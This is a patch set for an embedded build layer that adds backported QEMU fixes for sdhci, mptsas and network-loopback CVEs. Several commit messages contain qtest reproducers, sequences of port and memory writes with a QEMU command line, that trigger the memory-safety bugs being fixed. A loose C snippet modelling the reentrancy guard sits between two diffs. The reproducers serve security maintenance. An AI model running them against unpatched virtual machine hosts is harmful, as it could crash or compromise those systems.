+Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
+CVE: CVE-2021-3392
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/mptsas.c | 6 ------
+ hw/scsi/mptsas.h | 1 -
+ 2 files changed, 7 deletions(-)
+
+diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
+index 7416e78..db3219e 100644
+--- a/hw/scsi/mptsas.c
++++ b/hw/scsi/mptsas.c
+@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
+
+ static void mptsas_free_request(MPTSASRequest *req)
+ {
+- MPTSASState *s = req->dev;
+-
+ if (req->sreq != NULL) {
+ req->sreq->hba_private = NULL;
+ scsi_req_unref(req->sreq);
+ req->sreq = NULL;
+- QTAILQ_REMOVE(&s->pending, req, next);
+ }
+ qemu_sglist_destroy(&req->qsg);
+ g_free(req);
+@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
+ }
+
+ req = g_new0(MPTSASRequest, 1);
+- QTAILQ_INSERT_TAIL(&s->pending, req, next);
+ req->scsi_io = *scsi_io;
+ req->dev = s;
+
+@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
+
+ s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
+
+- QTAILQ_INIT(&s->pending);
+-
+ scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
+ }
+
+diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
+index b85ac1a..c046497 100644
+--- a/hw/scsi/mptsas.h
++++ b/hw/scsi/mptsas.h
+@@ -79,7 +79,6 @@ struct MPTSASState {
+ uint16_t reply_frame_size;
+
+ SCSIBus bus;
+- QTAILQ_HEAD(, MPTSASRequest) pending;
+ };
+
+ void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
new file mode 100644
index 0000000000..d53383247e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
+From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:35 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+At the end of sdhci_send_command(), it starts a data transfer if the
+command register indicates data is associated. But the data transfer
+should only be initiated when the command execution has succeeded.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001810
+outl 0xcfc 0xe1068000
+outl 0xcf8 0x80001804
+outw 0xcfc 0x7
+write 0xe106802c 0x1 0x0f
+write 0xe1068004 0xc 0x2801d10101fffffbff28a384
+write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
+write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
+write 0xe1068003 0x1 0xfe
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
+ -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive \
+ -monitor none -serial none -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Acked-by: Alistair Francis <alistair.francis@wdc.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
+ SDRequest request;
+ uint8_t response[16];
+ int rlen;
++ bool timeout = false;
+
+ s->errintsts = 0;
+ s->acmd12errsts = 0;
+@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
+ trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
+ s->rspreg[1], s->rspreg[0]);
+ } else {
++ timeout = true;
+ trace_sdhci_error("timeout waiting for command response");
+ if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
+ s->errintsts |= SDHC_EIS_CMDTIMEOUT;
+@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
+
+ sdhci_update_irq(s);
+
+- if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
++ if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
+ s->data_count = 0;
+ sdhci_data_transfer(s);
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
new file mode 100644
index 0000000000..dc00f76ec9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
+From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:36 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
+ transfer is in progress
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Per "SD Host Controller Standard Specification Version 7.00"
+chapter 2.2.1 SDMA System Address Register:
+
+This register can be accessed only if no transaction is executing
+(i.e., after a transaction has stopped).
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xfbefff00
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xfbefff2c 0x1 0x05
+write 0xfbefff0f 0x1 0x37
+write 0xfbefff0a 0x1 0x01
+write 0xfbefff0f 0x1 0x29
+write 0xfbefff0f 0x1 0x02
+write 0xfbefff0f 0x1 0x03
+write 0xfbefff04 0x1 0x01
+write 0xfbefff05 0x1 0x01
+write 0xfbefff07 0x1 0x02
+write 0xfbefff0c 0x1 0x33
+write 0xfbefff0e 0x1 0x20
+write 0xfbefff0f 0x1 0x00
+write 0xfbefff2a 0x1 0x01
+write 0xfbefff0c 0x1 0x00
+write 0xfbefff03 0x1 0x00
+write 0xfbefff05 0x1 0x00
+write 0xfbefff2a 0x1 0x02
+write 0xfbefff0c 0x1 0x32
+write 0xfbefff01 0x1 0x01
+write 0xfbefff02 0x1 0x01
+write 0xfbefff03 0x1 0x01
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ switch (offset & ~0x3) {
+ case SDHC_SYSAD:
+- s->sdmasysad = (s->sdmasysad & mask) | value;
+- MASKED_WRITE(s->sdmasysad, mask, value);
+- /* Writing to last byte of sdmasysad might trigger transfer */
+- if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
+- s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
+- if (s->trnmod & SDHC_TRNS_MULTI) {
+- sdhci_sdma_transfer_multi_blocks(s);
+- } else {
+- sdhci_sdma_transfer_single_block(s);
++ if (!TRANSFERRING_DATA(s->prnsts)) {
++ s->sdmasysad = (s->sdmasysad & mask) | value;
++ MASKED_WRITE(s->sdmasysad, mask, value);
++ /* Writing to last byte of sdmasysad might trigger transfer */
++ if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
++ SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
++ if (s->trnmod & SDHC_TRNS_MULTI) {
++ sdhci_sdma_transfer_multi_blocks(s);
++ } else {
++ sdhci_sdma_transfer_single_block(s);
++ }
+ }
+ }
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
new file mode 100644
index 0000000000..d06ac0ed3c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
+Backport of:
+
+From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:37 +0800
+Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When an ADMA transfer is started, the code forgets to set the
+controller status to indicate that a transfer is in progress.
+
+With this fix, the following 2 reproducers:
+
+https://paste.debian.net/plain/1185136
+https://paste.debian.net/plain/1185141
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
+
+ switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
+ case SDHC_ADMA_ATTR_ACT_TRAN: /* data transfer */
+-
++ s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
+ if (s->trnmod & SDHC_TRNS_READ) {
++ s->prnsts |= SDHC_DOING_READ;
+ while (length) {
+ if (s->data_count == 0) {
+ for (n = 0; n < block_size; n++) {
+@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
+ }
+ }
+ } else {
++ s->prnsts |= SDHC_DOING_WRITE;
+ while (length) {
+ begin = s->data_count;
+ if ((length + begin) < block_size) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
new file mode 100644
index 0000000000..2e49e3bc18
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:38 +0800
+Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
+ register is writable
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+The code to limit the maximum block size is only necessary when the
+SDHC_BLKSIZE register is writable.
+
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+- }
+
+- /* Limit block size to the maximum buffer size */
+- if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
+- qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
+- "the maximum buffer 0x%x", __func__, s->blksize,
+- s->buf_maxsz);
++ /* Limit block size to the maximum buffer size */
++ if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
++ "the maximum buffer 0x%x\n", __func__, s->blksize,
++ s->buf_maxsz);
+
+- s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
new file mode 100644
index 0000000000..7b436809e9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
+From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:39 +0800
+Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
+ a different block size is programmed
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+If the block size is programmed to a different value from the
+previous one, reset the data pointer of s->fifo_buffer[] so that
+s->fifo_buffer[] can be filled in using the new block size in
+the next transfer.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xe0000000
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xe000002c 0x1 0x05
+write 0xe0000005 0x1 0x02
+write 0xe0000007 0x1 0x01
+write 0xe0000028 0x1 0x10
+write 0x0 0x1 0x23
+write 0x2 0x1 0x08
+write 0xe000000c 0x1 0x01
+write 0xe000000e 0x1 0x20
+write 0xe000000f 0x1 0x00
+write 0xe000000c 0x1 0x32
+write 0xe0000004 0x2 0x0200
+write 0xe0000028 0x1 0x00
+write 0xe0000003 0x1 0x40
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
++ uint16_t blksize = s->blksize;
++
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+
+@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
+ }
++
++ /*
++ * If the block size is programmed to a different value from
++ * the previous one, reset the data pointer of s->fifo_buffer[]
++ * so that s->fifo_buffer[] can be filled in using the new block
++ * size in the next transfer.
++ */
++ if (blksize != s->blksize) {
++ s->data_count = 0;
++ }
+ }
+
+ break;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
new file mode 100644
index 0000000000..5bacd67481
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
+From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 11:44:36 +0800
+Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some NICs support loopback mode, which is done by calling
+nc->info->receive() directly; this in fact bypasses the reentrancy
+check that is done in qemu_net_queue_send().
+
+Unfortunately we can't use qemu_net_queue_send() here since for
+loopback there's no sender as peer, so this patch introduces
+qemu_receive_packet(), which is used for implementing loopback mode
+for a NIC with this check.
+
+NICs that support loopback mode will be converted to this helper.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ include/net/net.h | 5 +++++
+ include/net/queue.h | 8 ++++++++
+ net/net.c | 38 +++++++++++++++++++++++++++++++-------
+ net/queue.c | 22 ++++++++++++++++++++++
+ 4 files changed, 66 insertions(+), 7 deletions(-)
+
+diff --git a/include/net/net.h b/include/net/net.h
+index 778fc787c..03f058ecb 100644
+--- a/include/net/net.h
++++ b/include/net/net.h
+@@ -143,12 +143,17 @@ void *qemu_get_nic_opaque(NetClientState *nc);
+ void qemu_del_net_client(NetClientState *nc);
+ typedef void (*qemu_nic_foreach)(NICState *nic, void *opaque);
+ void qemu_foreach_nic(qemu_nic_foreach func, void *opaque);
++int qemu_can_receive_packet(NetClientState *nc);
+ int qemu_can_send_packet(NetClientState *nc);
+ ssize_t qemu_sendv_packet(NetClientState *nc, const struct iovec *iov,
+ int iovcnt);
+ ssize_t qemu_sendv_packet_async(NetClientState *nc, const struct iovec *iov,
+ int iovcnt, NetPacketSent *sent_cb);
+ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size);
++ssize_t qemu_receive_packet_iov(NetClientState *nc,
++ const struct iovec *iov,
++ int iovcnt);
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size);
+ ssize_t qemu_send_packet_async(NetClientState *nc, const uint8_t *buf,
+ int size, NetPacketSent *sent_cb);
+diff --git a/include/net/queue.h b/include/net/queue.h
+index c0269bb1d..9f2f289d7 100644
+--- a/include/net/queue.h
++++ b/include/net/queue.h
+@@ -55,6 +55,14 @@ void qemu_net_queue_append_iov(NetQueue *queue,
+
+ void qemu_del_net_queue(NetQueue *queue);
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size);
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt);
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+diff --git a/net/net.c b/net/net.c
+index 6a2c3d956..5e15e5d27 100644
+--- a/net/net.c
++++ b/net/net.c
+@@ -528,6 +528,17 @@ int qemu_set_vnet_be(NetClientState *nc, bool is_be)
+ #endif
+ }
+
++int qemu_can_receive_packet(NetClientState *nc)
++{
++ if (nc->receive_disabled) {
++ return 0;
++ } else if (nc->info->can_receive &&
++ !nc->info->can_receive(nc)) {
++ return 0;
++ }
++ return 1;
++}
++
+ int qemu_can_send_packet(NetClientState *sender)
+ {
+ int vm_running = runstate_is_running();
+@@ -540,13 +551,7 @@ int qemu_can_send_packet(NetClientState *sender)
+ return 1;
+ }
+
+- if (sender->peer->receive_disabled) {
+- return 0;
+- } else if (sender->peer->info->can_receive &&
+- !sender->peer->info->can_receive(sender->peer)) {
+- return 0;
+- }
+- return 1;
++ return qemu_can_receive_packet(sender->peer);
+ }
+
+ static ssize_t filter_receive_iov(NetClientState *nc,
+@@ -679,6 +684,25 @@ ssize_t qemu_send_packet(NetClientState *nc, const uint8_t *buf, int size)
+ return qemu_send_packet_async(nc, buf, size, NULL);
+ }
+
++ssize_t qemu_receive_packet(NetClientState *nc, const uint8_t *buf, int size)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive(nc->incoming_queue, buf, size);
++}
++
++ssize_t qemu_receive_packet_iov(NetClientState *nc, const struct iovec *iov,
++ int iovcnt)
++{
++ if (!qemu_can_receive_packet(nc)) {
++ return 0;
++ }
++
++ return qemu_net_queue_receive_iov(nc->incoming_queue, iov, iovcnt);
++}
++
+ ssize_t qemu_send_packet_raw(NetClientState *nc, const uint8_t *buf, int size)
+ {
+ return qemu_send_packet_async_with_flags(nc, QEMU_NET_PACKET_FLAG_RAW,
+diff --git a/net/queue.c b/net/queue.c
+index 19e32c80f..c872d51df 100644
+--- a/net/queue.c
++++ b/net/queue.c
+@@ -182,6 +182,28 @@ static ssize_t qemu_net_queue_deliver_iov(NetQueue *queue,
+ return ret;
+ }
+
++ssize_t qemu_net_queue_receive(NetQueue *queue,
++ const uint8_t *data,
++ size_t size)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver(queue, NULL, 0, data, size);
++}
++
++ssize_t qemu_net_queue_receive_iov(NetQueue *queue,
++ const struct iovec *iov,
++ int iovcnt)
++{
++ if (queue->delivering) {
++ return 0;
++ }
++
++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt);
++}
++
+ ssize_t qemu_net_queue_send(NetQueue *queue,
+ NetClientState *sender,
+ unsigned flags,
+--
+2.29.2
+
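
For reference, the reentrancy guard that qemu_net_queue_receive() relies on can
be modelled in isolation: a delivery attempted while another delivery on the
same queue is still in progress is dropped instead of recursing (made-up types
below, not the QEMU API):

    #include <stdbool.h>
    #include <stdio.h>

    struct queue { bool delivering; };

    static long deliver(struct queue *q, const char *data);

    static long receive_packet(struct queue *q, const char *data)
    {
        if (q->delivering) {
            return 0;                 /* reentrant call: refuse, break the loop */
        }
        return deliver(q, data);
    }

    static long deliver(struct queue *q, const char *data)
    {
        q->delivering = true;
        /* a device model looping the packet straight back to itself: */
        long nested = receive_packet(q, data);
        q->delivering = false;
        printf("nested delivery returned %ld\n", nested);   /* prints 0 */
        return 1;
    }

    int main(void)
    {
        struct queue q = { .delivering = false };
        receive_packet(&q, "frame");
        return 0;
    }
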
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
new file mode 100644
index 0000000000..fdb4894e44
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch
@@ -0,0 +1,41 @@
+From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:35:30 -0500
+Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/lan9118.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/lan9118.c
+===================================================================
